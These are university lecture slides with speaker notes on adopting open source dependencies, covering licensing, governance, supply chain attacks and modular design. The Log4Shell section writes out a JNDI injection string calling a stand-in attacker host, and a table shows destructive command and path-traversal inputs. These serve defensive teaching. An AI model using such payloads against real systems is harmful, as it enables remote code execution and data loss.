Lecture overview:

• Total time: ~40 minutes
• Prerequisites: L17 (dependency injection), L18-L19 (architectural thinking)
• Connects to: L24 (security), future lectures on supply chain and teams

Structure:

• Component Reuse & OSS Ecosystems (~15 min)
• Licensing: Copyleft vs. Permissive (~10 min)
• Evaluating Dependencies (~15 min)

Key theme: Modern software is built on open source foundations. Understanding how to evaluate, adopt, and manage dependencies is a critical professional skill.

→ Transition: Let's start with the title...

CS 3100: Program Design and Implementation II

Lecture 23: Open Source Frameworks

©2026 Jonathan Bell, CC-BY-SA

Context:

• We've been building systems with components wired together (L17-L19)
• Today: where do those components come from? How do we evaluate them?
• Running theme: modern software is not written from scratch

Key message: "Your code depends on thousands of developers you've never met. Today we learn how to be a responsible participant in that ecosystem."

→ Transition: Here's what you'll be able to do after today...

Learning Objectives

After this lecture, you will be able to:

1. Explain how component reuse simplifies software development and the role of OSS ecosystems in distributing reusable components
2. Describe the role and impact of copyleft licenses on OSS
3. Describe tradeoffs that should be considered when adopting a library or framework
4. Evaluate a dependency's community health, governance model, and long-term viability

Time allocation:

• Objective 1: Component Reuse (~15 min)
• Objective 2: Licensing (~10 min)
• Objectives 3-4: Evaluating Dependencies (~15 min)

Connection to prior lectures:

• L17: We injected dependencies — but where do they come from?
• L18-19: We drew service boundaries — but many components are open source libraries

→ Transition: Let's start with a simple example...

One Line of Code...

Modern software is not written from scratch. Consider adding JSON support to your project:

// build.gradle
dependencies {
    implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.0'
}

Three JARs for one "dependency." But this is just the beginning...

Start simple:

• One line in build.gradle brings in Jackson
• Run gradle dependencies and you see the tree
• Three JARs for one "dependency"

Set up the reveal:

• "But this is just the beginning..."
• We're about to show them how deep the rabbit hole goes

→ Transition: What if we want the full Jackson ecosystem?

...But Real Apps Need More

Most apps need Java 8 date/time support and Optional handling. Add two more modules:

Notice the diamond dependencies — multiple paths to jackson-databind. Maven/Gradle resolves these, but version conflicts can cause subtle bugs.

Expanding complexity:

• Full Jackson usage typically includes date/time support (jsr310), Optional handling (jdk8)
• Each module depends on the core — creating diamond dependencies
• Maven/Gradle deduplicates, but version mismatches can cause runtime errors

The diamond problem:

• If jackson-datatype-jsr310 wants databind 2.14.0 but you declared 2.15.0...
• Build tool picks one (usually newest), but this can break assumptions
• "It worked on my machine" often traces back to dependency version differences

→ Transition: What if you need XML and YAML support too?

Third-Party Dependencies Appear

Add XML and YAML format support — now third-party libraries enter the picture:

Three different organizations now contribute to your project: FasterXML (Jackson), Codehaus (Stax2), and org.yaml (SnakeYAML).

The third-party explosion:

• Jackson XML support needs a Stax XML parser
• Woodstox is a popular Stax implementation — maintained by FasterXML but separate project
• stax2-api is from Codehaus — a DIFFERENT organization
• SnakeYAML is from org.yaml — yet another organization

Real output from mvn dependency:tree:

jackson-dataformat-xml:2.15.0
├── stax2-api:4.2.1 (org.codehaus.woodstox)
└── woodstox-core:6.5.1 (com.fasterxml.woodstox)
jackson-dataformat-yaml:2.15.0
└── snakeyaml:2.0 (org.yaml)

→ Transition: Let's count what we've accumulated...

Thousands of Shoulders

Five lines in your build file. Ten JAR files from four organizations.

$ mvn dependency:tree
com.example:jackson-deps:jar:1.0-SNAPSHOT
├── jackson-databind:2.15.0
│   ├── jackson-annotations:2.15.0
│   └── jackson-core:2.15.0
├── jackson-datatype-jsr310:2.15.0
├── jackson-datatype-jdk8:2.15.0
├── jackson-dataformat-xml:2.15.0
│   ├── stax2-api:4.2.1           ← org.codehaus.woodstox
│   └── woodstox-core:6.5.1       ← com.fasterxml.woodstox
└── jackson-dataformat-yaml:2.15.0
    └── snakeyaml:2.0             ← org.yaml

What you wrote:

• 5 dependency declarations
• ~20 lines of Java

What you're running:

• 10 JAR files
• 4 different organizations
• Dozens of maintainers

Your JSON/XML/YAML handling stands on the shoulders of developers you've never met, at organizations you may not have heard of.

The numbers are real:

• Run mvn dependency:tree on any Java project
• You'll see transitive dependencies from organizations you've never heard of
• Each one maintained by someone, somewhere

The key insight:

• You didn't write any of this code
• You're trusting maintainers at four different organizations
• SnakeYAML is maintained by ONE person (Andrey Somov)
• What happens if he stops maintaining it?

Bridge to next section:

• Who ARE these developers?
• Why do they give away their code?
• This leads us to the economics of open source...

→ Transition: This leads to a key insight about infrastructure...

Infrastructure Code Gravitates Toward Open Source

Your competitive advantage isn't your JSON parser — it's your recommendation algorithm, your UX, your content.

Layer	Examples	Who Builds It
Differentiation	Recommendation algorithms, UX, business logic	You (proprietary)
Infrastructure	JSON parsing, web servers, encryption, databases	Industry (open source)

Why would Netflix, Spotify, and Airbnb each employ engineers to independently build the same JSON parser? It makes far more sense to:

1. Share the cost of development across the industry
2. Benefit from bug fixes and security patches contributed by everyone
3. Focus proprietary effort on what actually differentiates your product

The economic argument:

• Infrastructure is a shared problem with a shared solution
• IBM committed over $1 billion to Linux development
• Microsoft — once calling Linux "communism" — now runs it across Azure and acquired GitHub

Companies contribute to open source because it's cheaper than going it alone.

Historical note (if time):

• The 1956 AT&T consent decree prevented them from selling Unix
• Bell Labs shared it freely with researchers — accidental open source!

→ Transition: This collaborative model has a name...

The Cathedral and the Bazaar

Eric S. Raymond's 1997 essay:

• Cathedral: Small group works in isolation, polished releases infrequently. Traditional proprietary software.
• Bazaar: Development in the open, frequent releases, users as co-developers, democratic governance.

The bazaar model powers most successful OSS today:

• Release early and often to get feedback
• Treat users as co-developers
• Modularize and reuse components

GitHub is the modern bazaar:

• Developer in Tokyo publishes Monday
• By Friday: teams in São Paulo, Berlin, Boston are using it, filing issues, submitting PRs
• This global collaboration was unimaginable when software shipped on CDs

→ Transition: And this model won...

Open Source Won the Platform Wars

The browser story:

• 1998: Netscape, facing extinction from IE, open-sourced their browser as Mozilla
• Netscape the company died, Firefox eventually lost market share
• But look at today: Chrome (Chromium), Safari (WebKit), Edge (Chromium) — ALL open source cores

The pattern repeats across the industry:

• Linux runs Android, AWS, most web servers
• SQLite is in every iPhone, Android device, browser
• Jackson, Spring, JUnit power most Java enterprise software
• React, TensorFlow, PyTorch — all open source foundations

Many projects maintained by surprisingly small teams — yet support billions in commercial software.

→ Transition: How does all this code get distributed?

The Ecosystem: Package Registries

Open source ecosystems depend on package registries to distribute reusable components:

Registry	Ecosystem	Examples
Maven Central	Java/JVM	JUnit, Spring, Jackson
npm	JavaScript	React, Express, lodash
PyPI	Python	pandas, tensorflow, requests
crates.io	Rust	serde, tokio
NuGet	.NET	Newtonsoft.Json, Entity Framework

These registries make it trivial to declare a dependency and have it automatically downloaded — along with all of its transitive dependencies.

Each ecosystem has its registry:

• Maven Central for Java — you've been using this with Gradle
• npm for JavaScript — 2+ million packages
• PyPI for Python — the pip install command

The magic:

• Declare what you need
• Build tool downloads it automatically
• Transitive dependencies resolved for you

→ Transition: But libraries evolve. How do we know if an update will break our code?

Semantic Versioning Encodes Promises

Libraries evolve. Semantic Versioning (SemVer) encodes compatibility promises in version numbers:

MAJOR . MINOR . PATCH

2 . 15 . 0

Change	Example	Meaning	Safe to Update?
PATCH	2.15.0 → 2.15.1	Bug fixes only	✅ Yes
MINOR	2.15.0 → 2.16.0	New features, backwards compatible	✅ Usually
MAJOR	2.15.0 → 3.0.0	Breaking changes	⚠️ Review needed

// Exact version — reproducible but requires manual updates
implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.0'

// Any 2.x version — automatic patches but risk of breakage
implementation 'com.fasterxml.jackson.core:jackson-databind:2.+'

The tradeoff:

• Strict versions: reproducible builds, but you must manually update
• Flexible ranges: automatic security patches, but risk unexpected breakage

Real-world complications:

• Not everyone follows SemVer perfectly
• "Breaking change" is sometimes subjective
• Hyrum's Law: "With sufficient users, every observable behavior becomes a dependency"

→ Transition: This ecosystem brings enormous benefits — and risks...

The Double-Edged Sword of Dependency

Benefits

• Speed: Don't reinvent the wheel; use battle-tested solutions
• Quality: Popular libraries debugged by millions of users
• Security: Vulnerabilities found and patched quickly (when maintained)

Risks

• Supply chain attacks: Compromised dependency compromises your app
• Abandonment: What happens when a maintainer stops updating?
• License compatibility: Can you legally use this code?

We'll explore the risks — licensing and evaluation — in the rest of this lecture.

The benefits are real:

• Jackson is better than anything you'd write for JSON
• Spring Security is better than rolling your own auth
• TensorFlow is better than implementing neural nets from scratch

But the risks are real too:

• left-pad: 11-line npm package deleted, broke thousands of builds
• Log4Shell: critical vulnerability in ubiquitous logging library
• License surprises: GPL code in your proprietary product

These risks are manageable — if you're aware of them.

→ Transition: Let's start with licensing...

Every Line of Code Is Copyrighted by Default

To understand open source licensing, we first need to understand copyright.

Copyright is automatic. The moment you write code, you own exclusive rights to:

• Copy the work
• Modify it (create "derivative works")
• Distribute copies to others
• Display or perform it publicly

Key insight: A GitHub repo with no LICENSE file means "all rights reserved."

You legally cannot use it — even if the author clearly intended to share it.

Copyright is the foundation:

• You don't need to register — it's automatic
• Without explicit permission, the default is "you can't use this"
• This is why licenses exist: to grant specific permissions

Common misconception:

• "It's on GitHub, so I can use it" — NO!
• "The author meant to share it" — doesn't matter legally
• Always check for a LICENSE file

→ Transition: Licenses grant permissions — but with different conditions...

From BSD to GPL: A Values Fork

The two licensing philosophies grew from the same code lineage — but diverged on a fundamental question about freedom.

Year	Event	Philosophy
1969	Bell Labs shares Unix freely (AT&T consent decree prevents selling it)	Accidental openness
1977	Berkeley builds on Unix, creates BSD license: "Do whatever you want, just credit us"	Maximum individual freedom
1983	Stallman sees companies closing BSD-derived source code. Launches GNU and GPL: "Share alike, forever"	Protect the commons

Both philosophies shaped the modern world:

BSD lineage (permissive)	GPL lineage (copyleft)
FreeBSD → macOS, iOS	GNU/Linux → Android, Cloud
Companies took the code and closed it — as intended	Companies must share kernel changes — as intended

The irony: BSD's freedom enabled companies to close the source — which is exactly what motivated Stallman to create a license that prevented it. Same code heritage, fundamentally different values.

The historical arc:

• Unix was shared freely because AT&T legally couldn't sell it (1956 DOJ antitrust consent decree)
• Berkeley researchers built on it, created BSD — their license reflected academic culture: share freely, credit the university
• Companies took BSD code, made proprietary products, and never shared back
• Stallman saw this and said: "This defeats the purpose. If code can be closed, the commons erodes."
• GPL was his answer: you can use it, but you must share your modifications

The naming is intentional: GNU = "GNU's Not Unix!" — Stallman's explicit break from Unix's model

Bridge to next slide: Both philosophies produced enormously successful projects. Let's see what they look like in practice...

→ Transition: These two philosophies still shape every licensing decision today...

Two Philosophies: Maximize Adoption vs. Protect the Commons

The BSD/MIT philosophy:

• Maximum freedom for individual users
• Even the freedom to close the source
• "Do whatever you want, just don't blame us"

The GPL philosophy (Stallman, 1983):

• Software should be "free as in speech, not as in beer"
• Four freedoms: run, study, redistribute, distribute modified versions
• Copyleft: if you distribute, you must share your source too

The key insight:

• This is a VALUES choice embedded in code
• When you choose a license — or adopt a dependency — you're making a statement
• Neither is objectively "correct"

→ Transition: Let's see the practical differences...

Permissive vs. Copyleft: Quick Reference

Question	Permissive (MIT, Apache, BSD)	Copyleft (GPL, LGPL, AGPL)
Can I use it in proprietary software?	Yes	Usually requires open-sourcing your code
Must I share my modifications?	No	Yes, if you distribute
Philosophy	Maximize adoption	Protect the commons
Popular examples	React, Jackson, Spring	Linux kernel, GCC, WordPress

Most popular libraries use permissive licenses: React (MIT), Jackson (Apache 2.0), Spring (Apache 2.0), TensorFlow (Apache 2.0)

GPL powers critical infrastructure: Linux kernel, many Linux utilities (maintained by GNU), forces community participation

Why permissive licenses dominate libraries:

• Companies can adopt without legal review
• Startups can use without worrying about open-sourcing
• Maximizes adoption → maximizes maintainers

Why GPL for operating systems:

• Ensures the commons stays open
• Companies CAN'T embrace-extend-extinguish
• Linux wouldn't be what it is without GPL protection

The SaaS loophole:

• GPL requires sharing if you DISTRIBUTE
• Running software as a service isn't "distribution"
• This is why MongoDB moved to SSPL — to close that loophole

→ Transition: Practical guidance...

Practical Licensing Guidance

For most developers using open source libraries:

1. Check the license before adding a dependency. It's usually in a LICENSE file or package metadata.
2. Permissive licenses are low-risk for most commercial projects.
3. GPL requires careful attention if you're building proprietary software — consult your legal team.

The philosophical debate continues:

• Should open source FORCE participation in the commons?
• Or ENCOURAGE it through permissive terms?
• No single right answer — both have produced wildly successful projects

Modern complications:

• SaaS loophole: Amazon runs MongoDB without sharing code
• Companies changing licenses mid-stream (we'll discuss this)
• "Source available" vs "open source" distinction

→ Transition: Some projects get creative with licenses...

Licenses as Values: The Unusual Cases

These edge cases reveal:

• Licensing is never purely technical
• It's always about what kind of world you want to build

The IBM story is real:

• Crockford confirmed it in a talk
• "I give permission to IBM, its customers, partners, and minions to use JSLint for evil"

The SSPL controversy:

• MongoDB moved from AGPL to SSPL
• SSPL: if you offer the software as a service, open-source your ENTIRE stack, including any related tools or infrastructure that you use to MANAGE that software-as-a-service operation!
• OSI says this isn't "open source" — it's "source available"

→ Transition: Now let's talk about evaluating dependencies...

Every Dependency Is a Commitment

Adding a dependency is easy — one line in build.gradle. But every dependency is a commitment.

Before adopting a library or framework, ask yourself:

• Who maintains this, and will they still be maintaining it in two years?
• What happens if I need to switch away from it later?
• Am I comfortable with the license terms?
• How much will this shape the rest of my code?

The last question matters most: A utility library for string formatting has minimal impact — swap it out easily. A web framework influences your entire application structure. Migrating away could mean a rewrite.

The commitment you're making:

• Trusting someone else's code to work correctly
• Trusting them to maintain it
• Trusting them not to introduce vulnerabilities
• Trusting them to keep the license stable

Library vs. Framework:

• Library: you call it (Jackson, lodash)
• Framework: it calls you (Spring, React, Rails)
• Frameworks are much harder to switch away from

→ Transition: The most important factor in evaluation...

Community Health: The Most Important Factor

Before adopting a library, investigate who's behind it and how active they are:

Indicator	What to Look For	Red Flags
Recent activity	Last commit? Last release?	No updates in 2+ years
Issue responsiveness	Are bugs acknowledged? PRs reviewed?	500 ignored issues
Bus factor	How many core maintainers?	Single maintainer
Documentation	Up-to-date? Comprehensive?	Outdated or missing docs

Sobering reality: OpenSSL — securing most of the internet — was maintained by a handful of volunteers until the Heartbleed vulnerability exposed how underfunded critical infrastructure can be.

A library with no updates might be:

• Stable and complete (rare)
• Abandoned (more common)

The bus factor:

• If one person maintains a critical library in their spare time...
• What happens when they burn out? Move on? Get hired by a company that doesn't allow OSS work?

Heartbleed (2014):

• Critical vulnerability in OpenSSL
• Affected ~17% of "secure" web servers
• Maintained by 2 people, one full-time
• Led to creation of Core Infrastructure Initiative

→ Transition: Different governance models have different risks...

Governance Models Shape Long-Term Risk

Model	Examples	Pros	Cons
Corporate-backed	Chromium (Google), React (Meta), TensorFlow (Google)	Well-funded, full-time devs	Priorities may shift; may change license
Foundation-governed	Apache projects, Linux Foundation, Python SF	Community governance, stable long-term	May move slower
Community/Individual	Many small libraries and utilities	Innovative, responsive	High abandonment risk; may lack security audits

Watch out for license changes:

• MongoDB: AGPL → Server Side Public License (SSPL)
• HashiCorp: Terraform from MPL → Business Source License (BSL)
• Redis: BSD → dual-license with SSPL

Corporate-backed risks:

• Google killed Google Reader, Stadia, etc. — they could deprioritize a project
• Meta could change React's license if business needs change
• Corporate priorities ≠ your priorities

Foundation-governed advantages:

• Apache, Linux Foundation have processes for succession
• No single company can make unilateral changes
• But: some "foundations" are just fronts for one company

The license change pattern:

• Company open-sources project to gain adoption
• Project becomes successful, competitors use it
• Company changes license to monetize
• Community must decide: accept or fork?

The three cases in detail:

1. MongoDB (2018): AGPL → SSPL

   • AGPL required sharing source if you distributed modifications
   • BUT cloud providers (AWS, etc.) ran MongoDB as-a-service without contributing back — the "SaaS loophole"
   • SSPL closes the loophole: if you offer it as a service, you must open-source your ENTIRE stack (management, orchestration, monitoring — everything)
   • Effectively blocks cloud providers from competing without paying MongoDB or open-sourcing their cloud infrastructure
   • OSI ruled SSPL is NOT open source — it's "source available"

2. HashiCorp/Terraform (2023): MPL → BSL

   • Terraform was Mozilla Public License — permissive, widely adopted
   • Cloud providers offered Terraform-compatible services, competing with HashiCorp's commercial offerings
   • BSL (Business Source License): you can VIEW the code, but can't use it to compete with HashiCorp
   • Community immediately forked as OpenTofu under Linux Foundation
   • This is the Terraform→OpenTofu fork we'll see on the next slide

3. Redis (2024): BSD → dual SSPL

   • Redis was BSD — one of the most permissive licenses
   • Same cloud provider concern: AWS ElastiCache, etc. competed without contributing
   • Changed to dual license: SSPL for new versions, or pay for commercial license
   • Led to fork: Valkey under Linux Foundation

The pattern: Open source to gain adoption → success attracts competitors → change license to capture value → community forks

→ Transition: When governance fails, communities fork...

When Governance Fails: The Fork

Original	Fork	What Happened
MySQL	MariaDB	Oracle acquired Sun (2009). Community worried about stewardship.
OpenOffice	LibreOffice	Oracle fired developers (2010). Community forked. LibreOffice won.
Terraform	OpenTofu	HashiCorp changed to restrictive license (2023). Linux Foundation hosts the fork.

The code can live on — but the disruption is painful for everyone. Forks are possible because the source is open. The only thing original creators keep is the trademark.

A fork is possible because:

• Source code is available under open license
• Anyone can take it and develop independently
• The only thing original creators keep: the trademark

The OpenOffice story:

• Sun open-sourced StarOffice as OpenOffice (1999)
• Oracle acquired Sun (2010), fired core developers
• Community forked as LibreOffice immediately
• Oracle donated remnants to Apache — too late, LibreOffice had won

The lesson:

• Governance matters more than code quality
• A project with healthy community governance is more resilient
• If governance fails, code can live on — but disruption is painful

→ Transition: Behind every dependency is a person...

The Human Side of Open Source

Behind every dependency in your build.gradle is a person — often unpaid, often alone.

The reality of OSS maintenance:

• Most critical infrastructure runs on volunteer labor
• OpenSSL (secures the internet): 2 maintainers pre-Heartbleed
• Burnout is the #1 cause of project abandonment

L22's bus factor — at ecosystem scale:

• Your team has 4 people. What if one leaves?
• SnakeYAML has one maintainer. What if they leave?
• The consequences ripple across thousands of projects
• This isn't a team problem — it's an industry problem

The paradox: We trust billion-dollar systems to maintainers we've never met, often without paying them. The same HRT principles from L22 apply here — except the "team" is the entire open source community.

Connect to L22:

• L22 introduced bus factor for your team (4 people)
• Today: bus factor for the ECOSYSTEM — one maintainer controls a library used by millions
• Same HRT principles apply, but the stakes are higher

core-js story:

• core-js provides JavaScript polyfills used by ~75% of top websites
• Maintained by one person, Denis Pushkarev
• He was imprisoned after a car accident — and the project nearly died
• Millions of websites depended on one person's freedom

The xkcd 2347 problem:

• "All modern digital infrastructure depends on a project some random person in Nebraska has been thanklessly maintaining since 2003"
• This isn't a joke — it's literally how the industry works

→ Transition: So what can we do about it?

A Well-Maintained Library Beats DIY for Security

Is it safer to use a popular library or write your own? Almost always use the library — if it's well-maintained.

Why well-maintained libraries win:

• Battle-tested by thousands of users
• Security researchers scrutinize popular projects
• Vulnerabilities get reported and patched
• You benefit from specialists' expertise

When dependencies introduce risk:

• Every dependency is an attack surface
• Transitive dependencies multiply the risk
• Unmaintained dependencies don't get patches
• You're trusting code you've never read

The key insight: You're unlikely to out-engineer the Jackson team at JSON parsing, or the Spring Security team at authentication. But you DO need to keep your dependencies updated.

The math:

• Your implementation: tested by you, maybe your team
• Jackson: tested by millions of users, security researchers, enterprise customers
• Who's more likely to catch edge cases?

But dependencies DO introduce risk:

• Your app might include libraries you've never heard of (transitive deps)
• One compromised package can compromise everything downstream
• The left-pad incident, Log4Shell — these are real

→ Transition: Let's look at supply chain attacks...

Supply Chain Attacks: When Dependencies Become Vectors

An attacker compromises a package deep in the dependency tree. Your app pulls it in transitively — you never knew it existed. Now the attacker's code runs in your application.

Incident	What Happened	Impact
left-pad (2016)	Developer unpublished an 11-line npm package	Thousands of builds broke — Facebook, Spotify, others
Log4Shell (2021)	Critical remote code execution in Log4j	Millions of apps affected; months to remediate

A chain is only as strong as its weakest link. The risks compound when you adopt a library and never update it, the library is abandoned, or a malicious actor compromises it.

The supply chain attack model:

• Attacker compromises a package deep in the dependency tree
• Your app pulls it in transitively — you never knew it existed
• Attacker's code now runs in your application

left-pad (2016):

• Developer unpublished an 11-line npm package
• Thousands of builds broke — including Facebook, Spotify
• Not malicious, but showed the fragility

Log4Shell (2021):

• Critical remote code execution in Log4j
• Log4j is EVERYWHERE — Java logging is ubiquitous
• Affected millions of applications worldwide
• Took months to fully remediate across the industry

The risks come when:

1. You adopt a library and never update it
2. The library is abandoned and stops receiving patches
3. A malicious actor compromises the library or its dependencies

→ Transition: So what can YOU do about this?

Log4Shell: When a Logging Library Became an Attack Vector

In December 2021, a critical vulnerability in Log4j — a ubiquitous Java logging library — exposed millions of systems to remote code execution. This is the supply chain attack that changed how the industry thinks about dependencies.

The attack in plain English: Log4j had a "helpful" feature that let logged strings contain lookups like ${jndi:ldap://...}. If an attacker put this string anywhere your app logged — a username field, a search box, even a browser User-Agent header — Log4j would fetch and execute code from the attacker's server.

Why Log4Shell was so devastating:

1. Ubiquity: Log4j is THE standard Java logging library. It's in nearly every Java application — including ones you've never heard of that run inside products you use daily. Minecraft, iCloud, Steam, Twitter — all affected.

2. Trivial to exploit: The attacker just needs to get a malicious string logged. That's it. Send ${jndi:ldap://evil.com/a} as your username, in a search query, in a User-Agent header, in a chat message — anywhere the app logs user input.

3. The "feature" that became a vulnerability:

   • Log4j supported "lookups" — variable substitution in log messages
   • ${env:USER} would expand to the username
   • ${jndi:ldap://...} would fetch data from an LDAP server
   • The JNDI lookup could return a Java class reference — which Log4j would then LOAD AND EXECUTE
   • This was a documented feature, not a bug — it was DESIGNED to do this

4. Why it went undetected for 8+ years:

   • The feature was added in 2013
   • Security researchers weren't looking at logging libraries for RCE
   • The feature was obscure — most developers didn't know it existed
   • Code audits focused on "obvious" attack surfaces like web endpoints
   • Nobody thought "what if someone logs a malicious string?" because logging feels safe

The remediation nightmare:

• You don't just update YOUR Log4j — you update every dependency that includes it
• Some apps bundled Log4j inside other JARs (shaded dependencies)
• Some vendors took weeks to release patches
• Some systems couldn't be updated without breaking other things

→ Transition: This connects directly to L20's security concepts...

Why Nobody Saw It Coming: "It's Just Logging"

You wouldn't pass user input directly to dangerous operations. But logging doesn't feel dangerous.

Operation	Would You Pass User Input Directly?
Runtime.exec("rm " + userInput)	No way! User could type -rf / and delete everything
new File(userInput).delete()	No way! User could type ../../../etc/passwd
log.info("User searched for: " + userInput)	Sure, why not? It's just writing text to a file...

The trust assumption that broke: Every developer assumed log.info(userInput) was a sink — data goes in, gets written to a file, nothing else happens. Log4j made it a source of network requests and code execution. Logging became as dangerous as Runtime.exec() — but nobody knew.

The psychology of why this went undetected:

1. Mental model of logging:

   • Logging feels like System.out.println() — it just writes text somewhere
   • Nobody thinks "what if the logging library executes my strings?"
   • Everyone knows not to pass user input to Runtime.exec() or ProcessBuilder
   • But logging? That's just... printing. What could go wrong?

2. The trust assumption:

   • You would NEVER write: Runtime.exec(userInput) — that's obviously dangerous
   • But log.info(userInput)? That seems completely safe
   • Log4j's lookup feature meant logging WAS like Runtime.exec()
   • ${jndi:ldap://evil.com} wasn't "text to write" — it was "instruction to execute"

3. Connect to L20's trust boundaries:

   • L20 taught: "Draw lines where trust ends — validate everything that crosses"
   • You drew your boundary at the API. Log4j had a HIDDEN boundary you didn't know about.
   • Your user input crossed YOUR trust boundary (validated) → then crossed Log4j's hidden boundary (not validated) → remote code execution

4. The "Fallacy 4" extension:

   • L20 Fallacy 4: "The network is secure" — you can't trust network traffic
   • Log4Shell adds: "The dependency is secure" — you can't blindly trust what dependencies do with your data
   • The network between your code and Log4j is "safe" (same JVM), but the TRUST wasn't safe

The architectural lesson:

• Your trust boundary extends through your entire dependency tree
• A "safe" operation (logging) became unsafe because of how a dependency implemented it
• This is why dependency hygiene is a security practice, not just housekeeping
• Tools like Dependabot, Snyk scan for known vulnerabilities — use them

→ Transition: So what can YOU do to be a responsible participant in this ecosystem?

Being a Good OSS Citizen

You're not just a consumer of open source — you're a participant. L22's HRT principles apply to the global community, not just your team.

Apply L22's practices to OSS:

• File good issues — you learned this in L22. Same template: steps to reproduce, expected vs. actual, environment.
• Look for "good first issue" labels — many projects tag beginner-friendly tasks. This is your on-ramp.
• Contribute docs, not just code — the most impactful first contribution is often a typo fix or a clearer example
• Respect maintainer time — they owe you nothing. A polite, well-researched issue gets answered; "fix this!" gets ignored.

Apply L22's HRT:

• Humility: You're new to their codebase. Ask before assuming.
• Respect: Read the CONTRIBUTING.md before submitting a PR. Follow their conventions, not yours.
• Trust: If a maintainer closes your issue, assume good faith. Ask why, don't demand.

Start now: Every one of you uses open source daily. You can contribute today — report a bug, improve docs, answer a question on Stack Overflow. You don't need permission to participate in the bazaar.

The L22 connection:

• L22 taught GitHub issues, PRs, code review, HRT — ALL of these apply to OSS participation
• The difference: your team has 4 people who know each other. An OSS project has strangers worldwide.
• Written communication matters even MORE here (L22's scalable knowledge sharing)

Practical starting points for students:

• Found a confusing error message? File an issue with context.
• Documentation wrong or unclear? Submit a PR fixing it.
• Answer questions in project discussions — you don't have to be an expert to help someone newer than you.

The culture matters:

• Some projects are welcoming (look for "good first issue" labels)
• Some are hostile — that's a signal about governance health (connects back to earlier slides)
• A project's community culture IS an evaluation criterion

→ Transition: Let's tie everything back to architecture...

Why the Bazaar Works: Modularity All the Way Down

The bazaar model only works because of information hiding. Every successful OSS library is a module with a clean boundary.

You don't know — and shouldn't care — how Jackson tokenizes JSON internally. That's the whole point. Information hiding is what lets strangers' code snap together like LEGO bricks.

The deep connection:

• L17: We learned about information hiding and dependency injection
• L18: We learned about drawing boundaries at the right places
• Today: ALL of that is what makes the bazaar possible

Without information hiding, OSS doesn't work:

• If Jackson exposed its internal tokenizer state, every update could break you
• If Spring leaked its internal request-handling pipeline, you'd be coupled to implementation details
• The API boundary IS the contract between you and a stranger's code

Parnas's insight applies globally:

• "Hide design decisions likely to change"
• OSS libraries change ALL THE TIME — that's their right
• Information hiding is what lets them change without breaking you

→ Transition: But what happens when boundaries are wrong?

Bad Boundaries Make OSS Adoption Impossible

If your code violates information hiding, you can't swap components — even when better alternatives exist.

Leaky boundary — locked in:

// Scattered throughout your codebase
JsonNode node = new ObjectMapper()
    .readTree(input);
// Cast to Jackson-specific types
ObjectNode obj = (ObjectNode) node;
obj.put("key", "value");
// Use Jackson's streaming API directly
JsonParser parser = factory.createParser(input);
while (parser.nextToken() != null) { ... }

Jackson internals leaked everywhere. Switching to Gson? Rewrite the whole app.

Clean boundary — swappable:

// One place defines the contract
public interface JsonSerializer {
    <T> String toJson(T object);
    <T> T fromJson(String json, Class<T> type);
}

// Jackson implementation (hidden behind boundary)
class JacksonSerializer implements JsonSerializer {
    private final ObjectMapper mapper =
        new ObjectMapper();
    // ... implementation details stay here
}

Switch to Gson? Write one new class. Nothing else changes.

L18's boundary heuristics told you: isolate things that change independently. OSS libraries change on THEIR schedule, not yours. That's exactly where a boundary belongs.

This is L17 + L18 in practice:

• L17: Inject dependencies through interfaces, don't hardcode
• L18: Draw boundaries where rate of change differs
• OSS libraries change at THEIR rate — you don't control it
• If you didn't draw the boundary, you're coupled to their release schedule

Real-world pain:

• Teams that scattered Hibernate-specific annotations everywhere couldn't migrate
• Teams that used Spring's RestTemplate directly throughout had to rewrite when WebClient replaced it
• Teams that wrapped their HTTP client behind an interface? Swapped in 30 minutes.

The lesson:

• The boundary between your code and an OSS library is one of the MOST important boundaries in your system
• Get it wrong, and you're locked in for the life of the project
• Get it right, and the bazaar becomes a superpower — swap components freely

→ Transition: This works in both directions...

Modularity Works Both Ways

Good boundaries don't just help you consume OSS — they're what make your code reusable in the first place.

What makes a module extractable into a reusable library?

Principle	What It Enables
Information hiding	Users don't depend on your internals — you can evolve freely
Clean interfaces	Users know exactly what to call and what to expect
Minimal dependencies	Users don't inherit YOUR dependency tree
Single responsibility	Users adopt only what they need — nothing extra

Every great OSS library started as a well-modularized internal component that someone realized others could use. Jackson, React, Kubernetes — all extracted from internal systems because the boundaries were clean enough to share.

The bazaar is built from well-designed modules:

• Jackson was extracted from FasterXML's internal tools
• React was extracted from Facebook's internal UI framework
• Kubernetes was extracted from Google's internal Borg system
• Spring was extracted from Rod Johnson's book examples

What they all had in common:

• Clean API boundary (information hiding)
• Minimal coupling to the parent system
• Single, well-defined responsibility
• Could be understood and used without understanding the original system

The flip side — what CAN'T be extracted:

• Code that reaches into other modules' internals
• Code with hidden dependencies on global state
• Code that does too many things (violates SRP)
• Code whose interface exposes implementation details

Connect to their experience:

• In your assignments, could you extract your data access layer and publish it?
• If not, what would need to change?
• The answer is almost always: better boundaries

→ Transition: Let's see the full picture...

The Virtuous Cycle: Modularity Enables the Ecosystem

Every principle we've studied this semester reinforces the others:

• Information hiding lets strangers' code work together without understanding each other's internals
• Clean boundaries let you swap one library for another when licenses change, maintainers disappear, or better options emerge
• Modularity is what lets a single developer in Tokyo publish a component on Monday that teams worldwide adopt by Friday
• Testability depends on all of the above — can you mock that dependency? Only if you injected it (L17) behind a clean interface (L18)

The bazaar doesn't work without modularity. And modularity doesn't matter without the bazaar to supply the components. They need each other. Every time you type implementation 'some:library:1.0', you're making an architectural decision. Evaluate it like one.

The big picture:

• This is the culmination of L17 → L18 → L19 → L23
• Information hiding isn't an academic exercise — it's what makes the modern software ecosystem possible
• Without it, every library would leak internals, every update would break consumers, and the bazaar would collapse

The virtuous cycle:

• Better modularity → easier to publish reusable code → more OSS available → more reason to design modular systems → better modularity
• This cycle has been accelerating for 30 years
• npm, Maven Central, PyPI — they exist because modularity works

Connect to L18 "build vs. buy":

• L18 compared thick action vs platform-driven architectures
• "Buy" almost always means "adopt OSS" — the same coupling vs. capability tradeoffs apply
• OSS choices directly impact every -ility: maintainability (who fixes bugs when the maintainer burns out?), security (supply chain attacks), changeability (license changes can force rewrites)

The warning:

• Break the cycle at any point and it falls apart
• Leak your abstractions? Can't swap components.
• Couple to internals? Can't upgrade.
• Skip boundaries? Can't extract reusable modules.

This is why we spent weeks on these principles — they're not just good engineering, they're the foundation the entire industry is built on.